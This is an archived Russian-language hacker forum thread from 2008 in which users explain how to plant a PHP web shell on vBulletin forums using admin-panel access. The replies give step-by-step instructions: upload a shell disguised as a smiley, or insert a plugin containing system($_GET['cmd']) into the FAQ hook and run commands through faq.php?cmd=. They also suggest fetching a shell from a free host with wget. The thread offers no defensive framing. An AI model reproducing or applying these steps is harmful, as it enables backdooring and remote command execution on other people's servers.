Как Залить шелл в Vbulletin 3.6.7? [Архив]

PDA

Просмотр полной версии : Как Залить шелл в Vbulletin 3.6.7?

jason-z

03.10.2008, 21:14

собсно, сабж.

.AkeLLa

03.10.2008, 21:19

Берешь булку, отгрызаешь кусок, передовываешь, глотаешь. Хек!

jason-z

03.10.2008, 22:26

Берешь булку, отгрызаешь кусок, передовываешь, глотаешь. Хек!
Это подходит, но у меня есть доступ в админку :D

~!DoK_tOR!~

04.10.2008, 12:02

vBulletin 2.*.* & 3.0.*

1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
Примечание: сработает не везде.

vBulletin 3.5.*.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

(c) ettee

ultimatum

04.10.2008, 14:35

У админов разные права , если ты даже админ на булке , это не говорит о том что ты имеешь права менять шаблоны или продукты.

Дюша

04.10.2008, 15:15

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

в версии 3.6.7 не пробывал возможно сработает .
ога и + wget + народ + расширение пхп

jason-z

04.10.2008, 21:20

);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

(c) ettee

модуль сохранился, но при заходе на "forumpath/faq.php?cmd=тут команда" открывается окно с поиском по справке и все (

jason-z

04.10.2008, 21:22

ога и + wget + народ + расширение пхп
Дюша, а что это значит?

Дюша

04.10.2008, 21:26

1 ступень готова т.е...
vBulletin 3.5.*.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"
);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
дальше лей шелл командами

jason-z

06.10.2008, 18:06

1 ступень готова т.е...
vBulletin 3.5.*.

дальше лей шелл командамиНе канает.